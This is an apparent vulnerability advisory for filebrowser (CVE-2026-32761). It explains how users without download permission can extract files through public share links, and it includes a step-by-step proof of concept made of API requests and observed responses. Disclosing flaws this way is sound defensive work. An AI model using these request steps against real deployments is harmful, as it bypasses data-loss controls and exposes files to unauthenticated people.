PT-2026-26089 · Go · Github.Com/Filebrowser/Filebrowser

Published

2026-03-18

·

Updated

2026-03-18

·

CVE-2026-32761

CVSS v3.1

6.5

Medium

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

A permission enforcement flaw allows users without download privileges (download=false) to still expose and retrieve file content via public share links when they retain share privileges (share=true). This bypasses intended access control policy and enables unauthorized data exfiltration to unauthenticated users. Where download restrictions are used for data-loss prevention or role separation.

Details

The backend applies inconsistent authorization checks across download paths:
  • Direct raw download correctly enforces Perm.Download:
  • [raw.go](filebrowser/http/raw.go:82)
  • Share creation only enforces Perm.Share:
  • [share.go](filebrowser/http/share.go:21)
  • Public share/download handlers serve shared content without verifying owner Perm.Download:
  • public.go(filebrowser/http/public.go:18)
  • public.go(filebrowser/http/public.go:116)
As a result, a user who is blocked from direct downloads can create a share and obtain the same file via /api/public/dl/<hash>.

PoC

  1. Create a non-admin user with:
  • perm.share = true
  • perm.download = false
  1. Login as that user and upload a PDF file:
  • POST /api/resources/nodl secret <rand>.pdf with Content-Type: application/pdf
  1. Verify direct raw download is denied:
  • GET /api/raw/nodl secret <rand>.pdf
  • Expected and observed: 202 Accepted (blocked)
  1. Create share for same file:
  • POST /api/share/nodl secret <rand>.pdf
  • Observed: 200, response includes hash (example: qxfK3JMG)
  1. Download publicly without authentication:
  • GET /api/public/dl/<hash>
  • Observed (vulnerable): 200, Content-Type: application/pdf, and PDF bytes are returned
Live evidence captured (March 1, 2026):
  • create user: 201
  • create file: 200
  • direct /api/raw: 202 Accepted
  • create share: 200
  • public download /api/public/dl/mxK-ppZb: 200
  • public download content-type: application/pdf
  • public download body length: 327 bytes

Impact

This is an access control / authorization policy bypass vulnerability.
  • Who can exploit: Any authenticated user granted share=true but denied download.
  • Who is impacted: Operators and organizations relying on download restrictions to prevent data export.
  • What can happen: Restricted users can still distribute and retrieve files publicly, including unauthenticated access through share URLs.

Fix

Incorrect Authorization

Improper Access Control

IDOR

Weakness Enumeration

CWE-863CWE-284CWE-639

Related Identifiers

CVE-2026-32761
GHSA-68J5-4M99-W9W9

Affected Products

Github.Com/Filebrowser/Filebrowser